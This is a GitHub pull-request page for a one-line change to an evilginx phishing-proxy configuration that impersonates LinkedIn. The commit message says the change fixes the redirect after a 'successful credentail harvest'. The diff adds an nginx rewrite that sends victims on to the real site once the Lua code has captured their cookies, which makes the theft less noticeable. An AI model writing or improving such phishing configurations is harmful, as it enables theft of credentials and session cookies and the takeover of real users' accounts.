Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
When running a linked in evilginx page, it does not properly redirect
after a successful credentail harvest to the legitimate linked in site.
With this redirect statement, it does like it is supposed too.
  • Loading branch information
ltdenard committed May 11, 2018
commit 67786020c0d524811e1e14cbba8013e090f8a6d2
1 change: 1 addition & 0 deletions sites/linkedin/www.linkedin.com.conf
Original file line number Diff line number Diff line change
Expand Up @@ -133,6 +133,7 @@ server {
ngx.var.set_cookies_all = allcookies
end
}
rewrite ^/uas/{{COOKIE_HOST[0]}}$ https://{{TARGET_HOST[0]}} permanent;
}
}